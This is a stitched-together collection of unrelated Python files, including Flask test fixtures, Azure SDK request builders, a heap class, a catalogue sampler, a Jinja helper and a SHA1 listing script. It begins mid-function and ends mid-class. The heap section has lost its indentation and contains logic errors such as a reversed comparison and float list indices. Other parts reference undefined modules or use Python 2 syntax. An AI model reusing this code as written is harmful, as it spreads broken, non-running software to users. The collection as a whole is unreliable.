        ndxs.append(ndxs[-1] + sizes[cur])
        cur += 1
    return split_string(s, *ndxs)
class pset(OrderedDict):
    """An OrderedDict with prettier string display (useful when working with
    record lengths that are wider than your terminal).
    """
    def __repr__(self):
        pairs = ('%s: %r' % (str(key), str(val)) for key, val in self.items())
        return '{%s}' % ', '.join(pairs)
    def __str__(self):
        pairs = ('  %s: %r' % (str(key), str(val)) for key, val in self.items())
        return "{\n%s\n}" % ',\n'.join(pairs)
def pad(data, size, padchar=' '):
    """Pad `data` on the right with `padchar` so its length is exactly `size`.

    Raises ValueError when `data` is already longer than `size`.
    """
    shortfall = size - len(data)
    if shortfall < 0:
        raise ValueError("Data is longer than size, cannot pad.")
    if shortfall == 0:
        return data
    return data + padchar * shortfall
|
import pytest
from tests import utils
from app import create_app
@pytest.yield_fixture(scope='session')
def flask_app():
    """Session-scoped Flask app in 'testing' config with a fresh schema.

    Tables are created once before the session and dropped at teardown.
    """
    app = create_app(flask_config_name='testing')
    from app.extensions import db
    with app.app_context():
        db.create_all()
        yield app
        db.drop_all()
@pytest.yield_fixture()
def db(flask_app):
    """Per-test database handle; rolls back uncommitted state at teardown."""
    # pylint: disable=unused-argument,invalid-name
    from app.extensions import db as db_instance
    yield db_instance
    db_instance.session.rollback()
@pytest.fixture(scope='session')
def flask_app_client(flask_app):
    """Test client with auto-auth helpers and JSON-aware responses."""
    flask_app.test_client_class = utils.AutoAuthFlaskClient
    flask_app.response_class = utils.JSONResponse
    return flask_app.test_client()
@pytest.yield_fixture(scope='session')
def regular_user(flask_app):
    """Session-scoped regular user persisted for the whole test run."""
    # pylint: disable=invalid-name,unused-argument
    from app.extensions import db
    regular_user_instance = utils.generate_user_instance(
        username='regular_user'
    )
    db.session.add(regular_user_instance)
    db.session.commit()
    yield regular_user_instance
    db.session.delete(regular_user_instance)
    db.session.commit()
@pytest.yield_fixture(scope='session')
def readonly_user(flask_app):
    """Session-scoped user without regular-user privileges."""
    # pylint: disable=invalid-name,unused-argument
    from app.extensions import db
    readonly_user_instance = utils.generate_user_instance(
        username='readonly_user',
        is_regular_user=False
    )
    db.session.add(readonly_user_instance)
    db.session.commit()
    yield readonly_user_instance
    db.session.delete(readonly_user_instance)
    db.session.commit()
@pytest.yield_fixture(scope='session')
def admin_user(flask_app):
    """Session-scoped user with admin privileges."""
    # pylint: disable=invalid-name,unused-argument
    from app.extensions import db
    admin_user_instance = utils.generate_user_instance(
        username='admin_user',
        is_admin=True
    )
    db.session.add(admin_user_instance)
    db.session.commit()
    yield admin_user_instance
    db.session.delete(admin_user_instance)
    db.session.commit()
@pytest.yield_fixture(scope='session')
def internal_user(flask_app):
    """Session-scoped internal (service) user: active, non-admin, non-regular."""
    # pylint: disable=invalid-name,unused-argument
    from app.extensions import db
    internal_user_instance = utils.generate_user_instance(
        username='internal_user',
        is_regular_user=False,
        is_admin=False,
        is_active=True,
        is_internal=True
    )
    db.session.add(internal_user_instance)
    db.session.commit()
    yield internal_user_instance
    db.session.delete(internal_user_instance)
    db.session.commit()
|
import functools
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
# Alias for arbitrary JSON payloads handed to the request builders.
JSONType = Any
# Optional callback applied to (pipeline response, deserialized body, headers).
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
# Generated request builders skip client-side validation of inputs.
_SERIALIZER.client_side_validation = False
def build_list_request(
    resource_group_name: str,
    subscription_id: str,
    resource_name: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the GET request that lists ProactiveDetection configurations of
    an Application Insights component (auto-generated request builder).
    """
    api_version = "2018-05-01-preview"
    accept = "application/json"
    # Construct URL
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs')
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
        "resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
    }
    url = _format_url_section(url, **path_format_arguments)
    # Construct parameters
    query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    # Construct headers
    header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )
def build_get_request(
    resource_group_name: str,
    subscription_id: str,
    resource_name: str,
    configuration_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the GET request for a single ProactiveDetection configuration
    identified by `configuration_id` (auto-generated request builder).
    """
    api_version = "2018-05-01-preview"
    accept = "application/json"
    # Construct URL
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs/{ConfigurationId}')
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
        "resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
        "ConfigurationId": _SERIALIZER.url("configuration_id", configuration_id, 'str'),
    }
    url = _format_url_section(url, **path_format_arguments)
    # Construct parameters
    query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    # Construct headers
    header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )
def build_update_request(
    resource_group_name: str,
    subscription_id: str,
    resource_name: str,
    configuration_id: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the PUT request that updates a ProactiveDetection configuration;
    the body is passed via `json` or raw `content` (auto-generated builder).
    """
    content_type = kwargs.pop('content_type', None)  # type: Optional[str]
    api_version = "2018-05-01-preview"
    accept = "application/json"
    # Construct URL
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs/{ConfigurationId}')
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
        "resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
        "ConfigurationId": _SERIALIZER.url("configuration_id", configuration_id, 'str'),
    }
    url = _format_url_section(url, **path_format_arguments)
    # Construct parameters
    query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    # Construct headers
    header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
    if content_type is not None:
        header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
    return HttpRequest(
        method="PUT",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        json=json,
        content=content,
        **kwargs
    )
class ProactiveDetectionConfigurationsOperations(object):
    """ProactiveDetectionConfigurationsOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.applicationinsights.v2018_05_01_preview.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    models = _models
    def __init__(self, client, config, serializer, deserializer):
        # Auto-generated operations class: stores the shared pipeline client
        # and the (de)serializers supplied by the service client.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    @distributed_trace
    def list(
        self,
        resource_group_name: str,
        resource_name: str,
        **kwargs: Any
    ) -> List["_models.ApplicationInsightsComponentProactiveDetectionConfiguration"]:
        """Gets a list of ProactiveDetection configurations of an Application Insights component.
        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param resource_name: The name of the Application Insights component resource.
        :type resource_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: list of ApplicationInsightsComponentProactiveDetectionConfiguration, or the result of
         cls(response)
        :rtype:
         list[~azure.mgmt.applicationinsights.v2018_05_01_preview.models.ApplicationInsightsComponentProactiveDetectionConfiguration]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType[List["_models.ApplicationInsightsComponentProactiveDetectionConfiguration"]]
        # 401/404/409 map to typed exceptions; anything else non-200 raises below.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_list_request(
            resource_group_name=resource_group_name,
            subscription_id=self._config.subscription_id,
            resource_name=resource_name,
            template_url=self.list.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('[ApplicationInsightsComponentProactiveDetectionConfiguration]', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs'} # type: ignore
    @distributed_trace
    def get(
        self,
        resource_group_name: str,
        resource_name: str,
        configuration_id: str,
        **kwargs: Any
    ) -> "_models.ApplicationInsightsComponentProactiveDetectionConfiguration":
        """Get the ProactiveDetection configuration for this configuration id.
        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param resource_name: The name of the Application Insights component resource.
        :type resource_name: str
        :param configuration_id: The ProactiveDetection configuration ID. This is unique within a
         Application Insights component.
        :type configuration_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ApplicationInsightsComponentProactiveDetectionConfiguration, or the result of
         cls(response)
        :rtype:
         ~azure.mgmt.applicationinsights.v2018_05_01_preview.models.ApplicationInsightsComponentProactiveDetectionConfiguration
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplicationInsightsComponentProactiveDetectionConfiguration"]
        # 401/404/409 map to typed exceptions; anything else non-200 raises below.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_get_request(
            resource_group_name=resource_group_name,
            subscription_id=self._config.subscription_id,
            resource_name=resource_name,
            configuration_id=configuration_id,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ApplicationInsightsComponentProactiveDetectionConfiguration', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs/{ConfigurationId}'} # type: ignore
    @distributed_trace
    def update(
        self,
        resource_group_name: str,
        resource_name: str,
        configuration_id: str,
        proactive_detection_properties: "_models.ApplicationInsightsComponentProactiveDetectionConfiguration",
        **kwargs: Any
    ) -> "_models.ApplicationInsightsComponentProactiveDetectionConfiguration":
        """Update the ProactiveDetection configuration for this configuration id.
        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param resource_name: The name of the Application Insights component resource.
        :type resource_name: str
        :param configuration_id: The ProactiveDetection configuration ID. This is unique within a
         Application Insights component.
        :type configuration_id: str
        :param proactive_detection_properties: Properties that need to be specified to update the
         ProactiveDetection configuration.
        :type proactive_detection_properties:
         ~azure.mgmt.applicationinsights.v2018_05_01_preview.models.ApplicationInsightsComponentProactiveDetectionConfiguration
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ApplicationInsightsComponentProactiveDetectionConfiguration, or the result of
         cls(response)
        :rtype:
         ~azure.mgmt.applicationinsights.v2018_05_01_preview.models.ApplicationInsightsComponentProactiveDetectionConfiguration
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplicationInsightsComponentProactiveDetectionConfiguration"]
        # 401/404/409 map to typed exceptions; anything else non-200 raises below.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
        # Serialize the model into the JSON body before building the PUT request.
        _json = self._serialize.body(proactive_detection_properties, 'ApplicationInsightsComponentProactiveDetectionConfiguration')
        request = build_update_request(
            resource_group_name=resource_group_name,
            subscription_id=self._config.subscription_id,
            resource_name=resource_name,
            configuration_id=configuration_id,
            content_type=content_type,
            json=_json,
            template_url=self.update.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ApplicationInsightsComponentProactiveDetectionConfiguration', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Insights/components/{resourceName}/ProactiveDetectionConfigs/{ConfigurationId}'} # type: ignore
|
class Heap(object):
def __init__(self, data=[]):
if len(data) == 0:
self.data = [None] * 100
else:
self.data = data
self.__size = sum([1 if item is not None else 0 for item in self.data])
self.__heapify()
def size(self):
return self.__size
def empty(self):
return self.__size == 0
def get_max(self):
return self.data[0]
def delete_max(self):
max_data = self.data[0]
self.__swap(0, self.__size - 1)
self.data[self.__size - 1] = None
self.__size -= 1
self.__percolate_down(0)
return max_data
def insert(self, number):
if self.__size == len(self.data):
self.__expand()
self.__size += 1
self.data[self.__size - 1] = number
return self.__percolate_up(self.__size - 1)
@staticmethod
def heap_sort(data):
heap = Heap(data)
index = heap.size() - 1
while not heap.empty():
heap.data[index] = heap.delete_max()
index -= 1
return heap.data
def __percolate_down(self, i):
initial_value = self.data[i]
current_index = i
potential_parent = self.__proper_parent(current_index)
while self.data[potential_parent] > self.data[current_index]:
self.data[current_index] = self.data[potential_parent]
current_index = potential_parent
potential_parent = self.__proper_parent(current_index)
self.data[current_index] = initial_value
return current_index
def __percolate_up(self, i):
if not self.__has_parent(i):
return 0
initial_value = self.data[i]
parent_indexes = []
h = 1
current_index = i
while self.__has_parent(current_index):
current_index = ((i + 1) >> h) - 1
parent_indexes.append(current_index)
h += 1
lo = 0
hi = len(parent_indexes) - 1
while lo + 1 < hi:
mi = (lo + hi) / 2
if self.data[parent_indexes[mi]] <= self.data[i]:
lo = mi
else:
hi = mi
parent_indexes.insert(0, i)
lo = lo + 1
index = 0
while index < lo:
self.data[parent_indexes[index]] = self.data[parent_indexes[index + 1]]
index += 1
self.data[parent_indexes[lo]] = initial_value
return parent_indexes[lo]
def __expand(self):
new_data = [None] * (self.__size * 2)
for i in range(self.__size):
new_data[i] = self.data[i]
self.data = new_data
def __heapify(self):
i = self.__last_internal()
while self.__in_heap(i):
self.__percolate_down(i)
i -= 1
def __swap(self, i , j):
temp = self.data[i]
self.data[i] = self.data[j]
self.data[j] = temp
def __in_heap(self, i):
return 0 <= i < self.size()
def __parent(self, i):
return (i - 1) >> 1
def __last_internal(self):
return self.__parent(self.size() - 1)
def __left_child(self, i):
return (i << 1) + 1
def __right_child(self, i):
return (i + 1) << 1
def __has_parent(self, i):
return 0 < i
def __has_left_child(self, i):
return self.__in_heap(self.__left_child(i))
def __has_right_child(self, i):
return self.__in_heap(self.__right_child(i))
def __bigger(self, i, j):
return i if self.data[i] > self.data[j] else j
def __proper_parent(self, i):
return self.__bigger(self.__bigger(self.__left_child(i), self.__right_child(i)), i) if self.__has_right_child(i) else \
self.__bigger(self.__left_child(i), i) if self.__has_left_child(i) else \
i
|
from gi.repository import Gtk, Gdk
class MapEntity:
    """A named entity placed at an (x, y) position on the map."""
    def __init__(self, xarg, yarg, namearg):
        self.x = xarg
        self.y = yarg
        self.name = namearg
    def getCoords(self):
        """Return the (x, y) position as a tuple."""
        return self.x, self.y
    def getx(self):
        """Return the x coordinate."""
        return self.x
    def gety(self):
        """Return the y coordinate."""
        return self.y
    def setCoords(self, xcoord, ycoord):
        """Move the entity to (xcoord, ycoord)."""
        self.x = xcoord
        self.y = ycoord
    def getName(self):
        """Return the display name."""
        return self.name
    def setName(self, strname):
        """Rename the entity."""
        self.name = strname
|
"""
.. module:: test
test
*************
:Description: test
:Authors: bejar
:Version:
:Created on: 10/02/2015 9:50
"""
__author__ = 'bejar'
from MeanPartition import MeanPartitionClustering
from kemlglearn.datasets import cluster_generator
import matplotlib.pyplot as plt
from sklearn.datasets import make_blobs, load_iris, make_circles
nc = 15  # number of clusters to generate and to ask the clusterer to recover
X, y = cluster_generator(n_clusters=nc, sepval=0.2, numNonNoisy=100, numNoisy=10, rangeN=[150, 200])
# Mean-partition clustering with a spectral embedding, comparing partitions by ANMI.
gkm = MeanPartitionClustering(n_clusters=nc, n_components=40, n_neighbors=3, trans='spectral', cdistance='ANMI')
res, l = gkm.fit(X, y)
# Scatter the embedded points, coloured by their assigned labels.
fig = plt.figure()
ax = fig.add_subplot(111)
plt.scatter(res[:, 0], res[:, 1], c=l)
plt.show()
|
import eventmaster
import time
import random
import sys
import unittest
import sys
class InputsTestCase(unittest.TestCase):
    """Integration tests for renaming switcher inputs over CommsXML.

    NOTE(review): `E2S3` is referenced below but only `eventmaster` is
    imported — setUp raises NameError as written; confirm the intended
    module or alias before relying on these tests.
    """
    def setUp(self):
        # Connect to a local switcher and block until it reports ready.
        # NOTE(review): returning -1 from setUp has no effect under unittest;
        # a failed connection should probably self.fail() or skipTest().
        self.s3 = E2S3.E2S3Switcher()
        self.s3.set_verbose(0)
        self.s3.set_CommsXML_IP("127.0.0.1")
        self.s3.set_CommsXML_Port(9876)
        if not self.s3.connect(): return -1
        while self.s3.is_ready() != 1: time.sleep(1)
    def test_set_valid_name_on_invalid_input(self):
        """Naming a non-existent input index must raise ValueError."""
        test_str = "PYTEST-{0!s}".format(random.randint(1,10))
        self.assertRaises(ValueError, lambda: self.s3.get_input(99).set_Name(test_str))
    def test_set_valid_name_on_valid_input(self):
        """A name set on input 0 should round-trip once the command is processed."""
        test_str = "PYTEST-{0!s}".format(random.randint(1,10))
        while(self.s3.has_been_processed(self.s3.get_input(0).set_Name(test_str))==0): time.sleep(1)
        time.sleep(1)
        self.assertEqual(test_str, self.s3.get_input(0).get_Name())
    def test_set_invalid_name_on_valid_input(self):
        """Passing a non-string (a class object) should yield None, not a rename."""
        MyObject = type('MyObject', (object,), {})
        self.assertEqual(self.s3.get_input(0).set_Name(MyObject), None)
print unittest.main()  # Py2 print; NOTE(review): unittest.main() normally calls sys.exit itself, so this print/exit pair is unlikely to run as intended
sys.exit()
|
""" synrcat
gaussian mixture model
"""
import sys
import os
import numpy as np
import logging
from collections import OrderedDict
from astropy.table import Table
from pypeline import pype, add_param, depends_on
from syn import Syn
from syncat.errors import NoPoints
import syncat.misc as misc
import syncat.fileio as fileio
import time
@add_param('cat_model', metavar='filename', default='out/syn.pickle', type=str,
help='file with catalogue model to load')
@add_param('hints_file', metavar='filename', default='in/syn_hints.txt', type=str,
help='give hints about parameter distributions')
@depends_on(Syn)
class GaussianMixtureModel(pype):
""" SynCat mode to generate random catalogue by sampling from a gaussian mixture model.
Parameters
----------
mask : minimask.Mask instance
mask describing survey geometry to sample from. If None, sample from full-sky.
cat_model : str
path to file with catalogue model to load
hints_file : str
path to file with hints about parameter distributions
"""
    def __init__(self, config={}, mask=None, **kwargs):
        """Parse config/kwargs via the pype base, set up logging, load hints,
        and store the optional sky mask.

        NOTE(review): the mutable default `config={}` is shared across calls;
        safe only if _parse_config never mutates it — confirm.
        """
        self._parse_config(config, **kwargs)
        self._setup_logging()
        self.load_hints()
        self.mask = mask
        self.syn = None
def sample_sky(self, zone=None, nside=None, order=None):
""" Sample sky coordinates.
Parameters
----------
zone : int, list
optional healpix zone index or list of indices from which to sample. Otherwise sample from all zones.
nside : int
healpix nside for zone pixelization
order : str
healpix ordering for zone pixelization
"""
return np.transpose(self.mask.draw_random_position(density=self.config['density'], n=self.config['count'],
cell=zone, nside=nside))
def load_hints(self):
""" Load the hints file.
The hints file contains information about the parameter distributions.
"""
self.hints = {}
if os.path.exists(self.config['hints_file']):
for line in file(self.config['hints_file']):
line = line.strip()
if line == "":
continue
if line.startswith("#"):
continue
words = line.split()
instruction = None
low = None
high = None
name = words.pop(0)
if len(words) > 0:
instruction = words.pop(0)
if len(words) > 0:
low = float(words.pop(0))
if len(words) > 0:
high = float(words.pop(0))
if instruction not in self.hints:
self.hints[instruction] = []
self.hints[instruction].append((name, low, high))
self.logger.info("got hint for '%s': instruction is %s with range: %s, %s", name, instruction, low, high)
return self.hints
def fit(self, filename=None, add_columns=True):
""" Fit a Gaussian mixture model to the input catalogue.
Parameters
----------
filename : str
path to input catalogue.
"""
if filename is None:
filename = self.config['in_cat']
if os.path.exists(self.config['cat_model']) and not self.config['overwrite']:
self.logger.info("reading %s", self.config['cat_model'])
self.syn = Syn(self.config['cat_model'])
self.labels = self.syn.labels
return
hints = self.load_hints()
self.logger.info("loading %s", filename)
table = fileio.read_catalogue(filename, format=self.config['input_format'], columns=self.config['input_columns'], quick=self.config['quick'])
table_dtype = table.dtype
table = misc.remove_columns(table, self.config['skip'])
properties = list(table.dtype.names)
if self.logger.isEnabledFor(logging.INFO):
mesg = ""
for i, p in enumerate(properties):
mesg += "\n{:>3} {}".format(1 + i, p)
self.logger.info("got these %i columns:%s", len(properties), mesg)
self.syn = Syn(labels=properties, hints=hints, config=self.config)
dtype = table.dtype
if add_columns:
dtype = misc.append_dtypes(dtype, self.config['add_columns'], table_dtype)
if self.config['sample_sky'] and self.config['skycoord_name'] not in dtype.names:
skycoord_name = self.config['skycoord_name']
alpha, delta = skycoord_name
skycoord_dtype = np.dtype([(alpha, np.float64), (delta, np.float64)])
dtype = misc.concatenate_dtypes([dtype, skycoord_dtype])
self.syn.fit(table, dtype=dtype)
# store column names
self.labels = properties
# save catalogue model
self.syn.save(self.config['cat_model'])
def sample(self):
""" Sample from the Gaussian mixture model.
Returns
-------
numpy strucarray : random catalogue
"""
if self.syn is None:
if not os.path.exists(self.config['cat_model']):
raise Exception("Cannot load catalogue model. Files does not exist: %s"%self.config['cat_model'])
self.syn = Syn(self.config['cat_model'])
if self.config['sample_sky']:
skycoord = self.sample_sky()
count = len(skycoord)
else:
count = self.config['count']
if count == 0:
raise NoPoints
randoms = self.syn.sample(n=count)
if self.config['sample_sky']:
skycoord_name = self.config['skycoord_name']
for i in range(len(skycoord_name)):
randoms[skycoord_name[i]] = skycoord[:,i]
return randoms
|
import re
from jinja2 import Environment
from .observable import Observable
def get_attribute(render_data, variable):
    """Resolve a dotted path against attributes or mapping keys.

    Each step prefers an attribute lookup and falls back to ``.get()``.
    Returns '' as soon as any step resolves to a falsy value.
    """
    current = render_data
    for part in variable.split('.'):
        if hasattr(current, part):
            current = getattr(current, part)
        else:
            current = current.get(part) or {}
        if not current:
            return ''
    return current
# Matches a brace-delimited template variable span like '{ name }'.
variable_re = re.compile(r'({\s*.*\s*})')
def is_function(text, node):
    """Render *text* against *node* and test the result.

    NOTE(review): hasattr() requires a string attribute name, but ``node``
    here is the render-data object, so in Python 3 this raises TypeError
    unless ``node`` is a str. Possibly ``callable(fnname)`` was intended --
    confirm against callers before changing.
    """
    fnname = render_template(text, node)
    return hasattr(fnname, node)
# Shared Jinja2 environment using single-brace delimiters ('{var}' rather
# than the default '{{var}}').
env = Environment(variable_start_string='{', variable_end_string='}')
def render_template(text, render_data):
    """Render *text* against *render_data* using the single-brace Jinja2 env.

    If *text* is not fully wrapped in braces it is rendered as a normal
    template string. Otherwise the inner expression is compiled and
    evaluated, so the result may be any Python value (e.g. a callable),
    not just a string.

    Note: a hand-rolled variable-substitution fallback that followed the
    second return was unreachable (both branches return) and was removed.
    """
    if not (text.startswith('{') and text.endswith('}')):
        return env.from_string(text).render(**vars(render_data))
    # Strip the outer braces and evaluate the expression directly.
    expr = text[1:-1]
    return env.compile_expression(expr)(**vars(render_data))
|
import os
import os.path
import stat
import hashlib
import sys
# Sentinel meaning "no byte limit" (read the entire file).
SHA1_MAX_BYTES_READ_DEFAULT = float("inf")  # defaults to read entire file
def sha1_hex_file(filepath, max_bytes=None):
    """
    Returns the SHA1 of a given filepath in hexadecimal.

    Opt-args:

    * max_bytes. If given and finite, reads at most max_bytes bytes from the
      file. Falsy values and the module's float("inf") sentinel mean "read
      the whole file".
    """
    sha1 = hashlib.sha1()
    # "with" guarantees the handle is closed even if read() raises
    # (the original leaked on success only by luck of the finally clause).
    with open(filepath, 'rb') as f:
        if max_bytes and max_bytes != float("inf"):
            # file.read() requires an int; the module-level default is the
            # float("inf") sentinel, which previously raised TypeError here.
            data = f.read(int(max_bytes))
        else:
            data = f.read()
    sha1.update(data)
    return sha1.hexdigest()
if __name__ == '__main__':
    import argparse
    # NOTE(review): the description string contains a stray "' +" -- left
    # untouched here since it is runtime output text.
    parser = argparse.ArgumentParser(description="""Finds files and creates a lists of their paths, inodes and sha1 checksums.' +
Useful to make a backup of filepaths before renaming them, for example before a large number of renames by a script.
SAMPLE CALLS
find_path_sha1.py
find_path_sha1.py -n 100000
""",
                                     epilog="Report any bugs to ciro.santilli@gmail.com",
                                     prog='Program')
    # NOTE(review): argparse applies type= only to command-line strings, so
    # the float("inf") default is passed through as a float -- confirm
    # sha1_hex_file handles it.
    parser.add_argument('-m', '--max-sha1-bytes',
                        action="store",
                        dest="sha1_max_bytes_read",
                        type=int,
                        default=SHA1_MAX_BYTES_READ_DEFAULT,
                        help='Maximum number of bytes to read to calculate SHA1 checksum.'+
                        'Reading the whole file might be too slow, and unnecessary for some applications.')
    args = parser.parse_args(sys.argv[1:])
    sha1_max_bytes_read = args.sha1_max_bytes_read
    # file_output is never used afterwards -- possibly leftover scaffolding.
    file_output = ""
    print "sha1_max_bytes_read"
    print sha1_max_bytes_read
    print
    # Walk the current directory, then print a sorted "path / sha1" report.
    paths = []
    for root, dirs, files in os.walk('.'):
        for bname in files:
            paths.append(os.path.join(root,bname))
    paths.sort()
    for path in paths:
        print path
        print str(sha1_hex_file(path,sha1_max_bytes_read))
        print
|
'''
Test
'''
import sys
sys.path.append('.')
from tornado.testing import AsyncHTTPSTestCase
from application import APP
class TestSomeHandler(AsyncHTTPSTestCase):
    """HTTPS test case exercising the application's root endpoint."""

    def get_app(self):
        """Provide the Tornado application under test."""
        return APP

    def test_index(self):
        """The index page should answer with HTTP 200."""
        response = self.fetch('/')
        self.assertEqual(response.code, 200)
|
from typing import Any
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from ._version import VERSION
class SynapseClientConfiguration(Configuration):
    """Configuration for SynapseClient
    Note that all parameters used to create this instance are saved as instance
    attributes.

    :param credential: Credential needed for the client to connect to Azure.
    :type credential: azure.core.credentials.TokenCredential
    :param synapse_dns_suffix: Gets the DNS suffix used as the base for all Synapse service requests.
    :type synapse_dns_suffix: str
    :param livy_api_version: Valid api-version for the request.
    :type livy_api_version: str
    """

    def __init__(
        self,
        credential,  # type: "TokenCredential"
        synapse_dns_suffix="dev.azuresynapse.net",  # type: str
        livy_api_version="2019-11-01-preview",  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> None
        # Fail fast on missing required parameters before touching the base class.
        if credential is None:
            raise ValueError("Parameter 'credential' must not be None.")
        if synapse_dns_suffix is None:
            raise ValueError("Parameter 'synapse_dns_suffix' must not be None.")
        if livy_api_version is None:
            raise ValueError("Parameter 'livy_api_version' must not be None.")
        super(SynapseClientConfiguration, self).__init__(**kwargs)

        self.credential = credential
        self.synapse_dns_suffix = synapse_dns_suffix
        self.livy_api_version = livy_api_version
        self.api_version = "2019-11-01-preview"
        # credential_scopes must be set before _configure(), which reads it
        # when building the bearer-token policy.
        self.credential_scopes = ['https://dev.azuresynapse.net/.default']
        self._configure(**kwargs)
        self.user_agent_policy.add_user_agent('azsdk-python-synapseclient/{}'.format(VERSION))

    def _configure(
        self,
        **kwargs  # type: Any
    ):
        # type: (...) -> None
